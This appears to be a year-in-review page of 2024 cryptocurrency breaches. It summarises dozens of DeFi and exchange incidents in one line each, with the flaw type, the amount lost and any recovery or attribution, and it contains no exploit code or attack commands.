2024The year in breaches

A reentrancy in Clober DEX's Rebalancer withdraw path on Base let an attacker re-enter before LP accounting settled, draining $500K in excess liquidity.

$8.7M drained from Polter Finance on Fantom after a flash loan inflated the SpookySwap BOO oracle to $1.37 trillion per token. Polter shut down.

$13.7M drained from UAE-based M2 Exchange hot wallets across BTC, ETH and Solana; identified, contained and customer funds restored in just 16 minutes.

Tapioca DAO lost $4.65M after a Discord member was social-engineered into connecting a hardware wallet; attacker seized TAP/USDO ownership. $2.7M recovered.

$53M drained from a 3-of-11 Radiant multi-sig after macOS malware hit three signers; the Safe UI showed clean txs while hardware wallets signed upgrades.

DPRK-style multi-chain compromise swept $52M from BingX hot wallets across Ethereum, BNB Chain, Avalanche, Optimism and Polygon.

Telegram message oracle flaw let an attacker drain $3M from 11 Banana Gun users via manual transfers on victim wallets. Team refunded victims from treasury.

DeltaPrime lost $6M on Arbitrum after a single private key was extracted; the team ran multi-sig on Avalanche but not Arbitrum. ZachXBT linked it to Lazarus.

~$20M swept from Indonesia's largest crypto exchange across multiple chains in a coordinated hot-wallet compromise during 2024's run of exchange breaches.

~$27M drained from Penpie after a reentrancy gap in Pendle's plugin integration let the attacker register a malicious market and pull pegged rewards in one tx.

A crypto whale lost $55.47M in DAI after signing a malicious transaction on a phishing copy of DeFi Saver's login page powered by Inferno Drainer.

A white-hat MEV bot drained $12M from Ronin's bridge via a dead-code init flaw that left minimumVoteWeight at zero. All funds returned for a $500K bounty.

Attacker extracted $6.4M from Astroport on Terra via an IBC-hooks reentrancy patched in April, then reintroduced in a June upgrade. ASTRO fell 60%.

WazirX lost $234.9M from a 4-of-6 Gnosis Safe at custodian Liminal when attackers exploited a mismatch between the Liminal UI and the calldata signers approved.

$11.6M drained from users who granted infinite approvals to LI.FI; a freshly deployed facet skipped a validation, letting any caller invoke arbitrary contracts.

Malicious PyPI package (bittensor 6.12.2) exfiltrated decrypted coldkeys and stole ~32,000 TAO ($8M); Opentensor firewalled validators in 35 minutes.

~$55M drained from BtcTurk's hot wallets, with Binance freezing roughly $5.3M of the stolen funds mid-flight — Turkey's largest exchange compromise to date.

A flaw in Holograph's operator contract let an attacker mint 1 billion HLG tokens, worth $14.4M nominal at first mint. HLG dropped 80% within nine hours.

UwULend lost $19.4M after an attacker manipulated 5 of 11 sUSDe oracles via Curve swaps, borrowing at $0.99 then liquidating at $1.03. A $3.7M follow-up hit.

$22M (158 BTC, 2,161 ETH, plus LTC/BCH) drained from Lykke in a private-key compromise the UK exchange tried to keep quiet; later attributed to Lazarus.

Velocore's CPMM pools on zkSync and Linea lost $6.8M when a fee-multiplier overflow let the attacker mint huge LP supply against a tiny single-token withdrawal.

DPRK operatives compromised a developer at wallet vendor Ginco via a fake LinkedIn job offer, draining 4,502.9 BTC ($305M) from Japanese exchange DMM Bitcoin.

Attacker took over a dormant MINTER role to mint 5B GALA ($216M), sold $21.8M before being blacklisted; the remaining 4.4B tokens are effectively burned.

DPRK's Lazarus drained $4.3M from ALEX Lab's Stacks cross-chain bridge via a flaw in the bridge's verification logic, traced via on-chain laundering.

Sonne Finance lost $20M on Optimism to a 'donation attack', a well-known Compound v2 fork exploit hitting the gap between deploying and seeding a new market.

$1.9M drained from Pike Finance after uninitialized upgradeable contracts let an attacker seize ownership and drain CCIP-bridged assets.

ZKasino took 10,515 ETH ($33M) from 8,000+ users on a 1:1 ETH return promise, then converted it to ZKAS and staked on Lido for 15 months. Founder arrested.

Hedgey Finance vesting lost $44.7M when missing parameter validation let the attacker craft campaigns whose claimLockup callback approved arbitrary transfers.

Grand Base, an RWA project on Base, lost $2M after its deployer key was compromised or abused; the attacker minted unlimited GB and drained the liquidity pool.

$11M drained from Prisma Finance's Trove migration helper after the attacker bypassed migrate() and called flashloan() directly, later demanding an apology.

Blast NFT game Munchables lost 17,413 ETH ($62.8M) to one of its developers, a likely North Korean operative hired to write the contract. All funds returned.

Attacker bought a nominal CGT stake, exploited a MakerDAO-fork flaw to amplify voting power, then minted 1B CGT (~$16M) on Curio Governance.

$4.8M drained from Super Sushi Samurai on Blast after a transfer-function bug doubled the sender's balance on self-transfer. A white-hat saw it first.

$2.1M drained from Unizen's DEX aggregator via an unsafe external-call vulnerability in a recent upgrade that hit users with token approvals.

WOOFi Swap on Arbitrum lost $8.75M after the attacker realised WOO's Chainlink oracle was never configured and the sPMM accepted any manipulated price.

$6.4M drained from Seneca users via unlimited approvals to its Chamber contract, which had no pause function. Attacker returned 80% for a 20% bounty.

A stolen admin key let the attacker add themselves as a minter and produce 1.79B PLA across two strikes — nominal $290M, only $32M successfully cashed out.

Precision/rounding bug in Abracadabra Money's Cauldron debt-accounting let an attacker drain $6.5M (2,740 ETH + 2.2M MIM) by repaying others' debts.

Orange Finance on Arbitrum lost ~$844K after its admin key was compromised, used to alter strategy contracts and withdraw managed Uniswap v3 positions.

$3.3M drained from Socket/Bungee bridge aggregator users via an unvalidated SocketGateway route that called transferFrom on infinite-approval wallets.

Gamma Strategies on Arbitrum lost $6.1M after a weak deposit-proxy price check let a flash-loan attacker deposit at a skewed ratio and withdraw outsized value.

~$82M drained from Orbit Chain's cross-chain bridge on New Year's Eve after seven of ten multi-sig signers were compromised; losses across Ethereum and Klaytn.